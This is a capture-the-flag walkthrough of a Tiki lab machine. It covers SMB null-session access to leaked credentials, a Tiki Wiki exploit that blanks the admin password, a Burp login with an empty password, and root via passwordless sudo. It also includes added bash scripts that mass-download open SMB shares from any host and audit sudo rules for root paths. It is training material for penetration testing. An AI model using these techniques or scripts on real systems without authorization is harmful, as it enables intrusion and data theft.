Tiki Walkthrough

Start by scanning the host with “nmap -A -T4 -p- 192.168.1.17 -vv” (-p- covers all 65535 TCP ports, -A adds version detection and default scripts):

Now run “dirb http://192.168.1.17 /usr/share/dirb/wordlists/big.txt”

We get some interesting results, but the one that matters is http://192.168.1.17/tiki/tiki-index.php, the Tiki Wiki front page: it has a login form, so first we need a username and a password.

I searched for Tiki Wiki exploits with “searchsploit” and ran “nikto”, but nothing useful came up, so the next step is “enum4linux”, since ports 139 and 445 (SMB) are open:

Now we have something: there is a share called “Notes” that we can access:

Using “smbclient \\\\192.168.1.17\\Notes” (press Enter at the password prompt, or add “-N” to skip it) we can access the share without any password. It contains a file “Mail.txt”; we download it with “get Mail.txt” and read it on our machine.
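The same share discovery and download, scripted so it can be rerun against other hosts. This is an added example, not code from the original post: it lists shares with “smbclient -L” instead of enum4linux, assumes smbclient is installed, takes the target IP as its only argument, and tries a null session against every non-admin disk share it finds.

```bash
#!/usr/bin/env bash
# Added example (not part of the original walkthrough).
# Usage: ./smb_loot.sh 192.168.1.17
# Lists SMB shares anonymously, keeps the disk shares that are not admin
# shares (names ending in "$", e.g. print$ and IPC$), and pulls every file
# from the ones that accept a null session into ./loot/<share>/.
set -u

# Extract usable disk share names from "smbclient -L" output: the table that
# follows the "Sharename  Type  Comment" header. Reads stdin so it can be
# exercised on a captured listing without a live host.
parse_shares() {
    awk '
        /^[[:space:]]*Sharename[[:space:]]/ { in_table = 1; next }
        in_table && /^[[:space:]]*-+/        { next }          # dashed separator row
        in_table && NF == 0                  { in_table = 0 }  # blank line ends the table
        in_table && $2 == "Disk" && $1 !~ /\$$/ { print $1 }   # skip print$, IPC$ etc.
    '
}

# Download everything in one share over a null session (-N: no password).
# "prompt off" suppresses per-file confirmation, "recurse on" walks subdirs.
dump_share() {
    target=$1
    share=$2
    mkdir -p "loot/$share"
    (
        cd "loot/$share" &&
        smbclient "//$target/$share" -N -c 'prompt off; recurse on; mget *'
    )
}

# Only run the live part when a target was given, so the functions above can
# be sourced or tested on their own.
if [ $# -eq 1 ]; then
    target=$1
    smbclient -L "$target" -N 2>/dev/null | parse_shares | while read -r share; do
        echo "[*] trying null session on //$target/$share"
        if dump_share "$target" "$share" >/dev/null 2>&1; then
            echo "[+] files saved under loot/$share"
            ls -l "loot/$share"
        else
            echo "[-] $share: null session refused or empty"
        fi
    done
fi
```

On the box in this post the only non-admin share is “Notes”, so the loot directory ends up holding Mail.txt; on a host with several shares the script saves you repeating the smbclient dance for each one.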

We get a username “Silky” and password “51lky571k1”, which we can use to log in to the Tiki Wiki panel:

Inside the panel I couldn't find anything useful to exploit, or any place to upload a reverse shell, until I found this page with a message:

So I searched online for the latest CVE for Tiki Wiki and found this exploit:

I downloaded the exploit and ran it:

And got this output:

The exploit has blanked the admin password, so the admin account can now be logged into with no password at all. The simplest way to send a login request with an empty password field is through Burp Suite, so let's start it:

This is the login request captured by Burp Suite's proxy; send it to “Repeater”, delete the password value and click Send:

Now refresh the page in the browser (or go back) and we are logged in as admin:

I kept looking for a way to upload a reverse shell but had no luck, until I found this page containing credentials for the user “silky”:

silky:Agy8Y7SPJNXQzqA

I can now SSH in with them:

Right after logging in, “sudo -l” shows that the user “silky” can run “sudo” without any password at all, so we run “sudo su”, become root and grab the flag:
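A post-login check that turns the “can run sudo without a password” observation into something you can run on any box you land on. This is an added example, not from the original post: it parses “sudo -l” output, separates a blanket “NOPASSWD: ALL” rule (instant root, as here) from NOPASSWD rules limited to specific commands (which need a per-binary look), and the sample output used in the comments and test is constructed, not captured from the Tiki machine.

```bash
#!/usr/bin/env bash
# Added example (not part of the original walkthrough).
# Usage: ./sudo_audit.sh --live        # runs "sudo -n -l" on the current host
#        sudo -n -l | ./sudo_audit.sh  # or feed a saved listing on stdin
set -u

# Keep only the privilege lines of "sudo -l" output. They are indented and
# start with a "(runas)" specification, e.g. "    (ALL : ALL) NOPASSWD: ALL";
# the "Matching Defaults entries" block is indented too but never starts
# with "(", so it is skipped.
sudo_rules() {
    awk '/^[[:space:]]+\(/ { sub(/^[[:space:]]+/, ""); print }'
}

# Classify one rule:
#   root-nopasswd  "(ALL ...)" or "(root ...)" may run ALL with NOPASSWD
#   nopasswd       NOPASSWD applies, but only to listed commands
#   passwd         a password is still required
classify_rule() {
    rule=$1
    case "$rule" in
        *NOPASSWD:*) ;;
        *) echo passwd; return ;;
    esac
    cmds=${rule##*NOPASSWD:}            # text after the tag
    cmds=${cmds#"${cmds%%[! ]*}"}       # strip leading spaces
    case "$rule" in
        "(ALL"*|"(root"*)
            if [ "$cmds" = "ALL" ]; then echo root-nopasswd; return; fi ;;
    esac
    echo nopasswd
}

# Read rules on stdin, print "<class>\t<rule>" per rule, and return 0 when at
# least one rule gives passwordless root.
audit() {
    found=1
    while IFS= read -r rule; do
        cls=$(classify_rule "$rule")
        printf '%s\t%s\n' "$cls" "$rule"
        [ "$cls" = root-nopasswd ] && found=0
    done
    return $found
}

if [ "${1:-}" = "--live" ]; then
    # -n: never prompt, so the script cannot hang waiting for a password
    if sudo -n -l 2>/dev/null | sudo_rules | audit; then
        echo "[+] passwordless root: 'sudo su' (as in the post) or 'sudo -n -i' gets a root shell"
    else
        echo "[-] no blanket NOPASSWD rule; review each listed command for a shell escape"
    fi
elif [ ! -t 0 ]; then
    sudo_rules | audit
fi
```

The distinction matters because “NOPASSWD: /usr/bin/vim” is also a one-step root, while “NOPASSWD: /usr/bin/id” is not; the script only calls the blanket rule a sure thing and leaves the restricted ones for you to inspect.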
